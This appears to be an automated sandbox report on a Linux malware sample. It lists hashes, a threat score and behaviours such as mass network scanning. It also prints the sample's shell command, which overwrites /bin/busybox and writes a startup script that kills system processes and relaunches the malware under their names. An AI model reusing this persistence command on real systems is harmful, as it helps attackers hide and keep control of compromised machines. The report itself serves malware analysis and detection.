Analysis
-
max time kernel
0s -
max time network
154s -
platform
linux_amd64 -
resource
ubuntu1804-amd64-en-20211208 -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
26-03-2023 08:26
Behavioral task
behavioral1
Sample
x86
Resource
ubuntu1804-amd64-en-20211208
ubuntu-18.04-amd64
4 signatures
150 seconds
General
-
Target
x86
-
Size
54KB
-
MD5
7c7be4c13eedd4687790c1ba127a6937
-
SHA1
8d1bed50c0f10f9380e955565e15e0d3cfc04132
-
SHA256
a7602ada97d833efbf2584af322ddd416e6dabcb1dbbfa38d86a6c96b6091898
-
SHA512
70a361a409debbc675c217d5be633aacbe7afd186b1962914e8e52e4aafac4ef1c2c5885bf6fe112371e38d6f9c47d7b8b96bbc8edc7354b72ad6ffbb4bb1bc2
-
SSDEEP
1536:S4Ew3tx+F9inCrb3bPUt0gIPSjKA18dIMGZirAMw:HEw3tx+FMnoLct0guSJmtGZTX
Score
9/10
Malware Config
Signatures
-
Contacts a large (37365) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Modifies Bash startup script 1 TTPs 1 IoCs
Processes:
shdescription ioc process /etc/profile.d/log.sh /etc/profile.d/log.sh sh -
Reads runtime system information 1 IoCs
Reads data from /proc virtual filesystem.
Processes:
mvdescription ioc process /proc/filesystems /proc/filesystems mv
Processes
-
/tmp/x86/tmp/x861⤵
-
/bin/shsh -c "mv -f /tmp/x86 /bin/busybox; chmod 777 /bin/busybox;echo -e 'pkill -9 busybox pkill -9 watchdog pkill -9 systemd /bin/busybox >/dev/null 2>&1 /bin/watchdog >/dev/null 2>&1 /bin/systemd >/dev/null 2>&1' > /etc/profile.d/log.sh;chmod 777 /etc/profile.d/log.sh"1⤵
- Modifies Bash startup script
-
/bin/mvmv -f /tmp/x86 /bin/busybox2⤵
- Reads runtime system information
-
/bin/chmodchmod 777 /bin/busybox2⤵
-
/bin/chmodchmod 777 /etc/profile.d/log.sh2⤵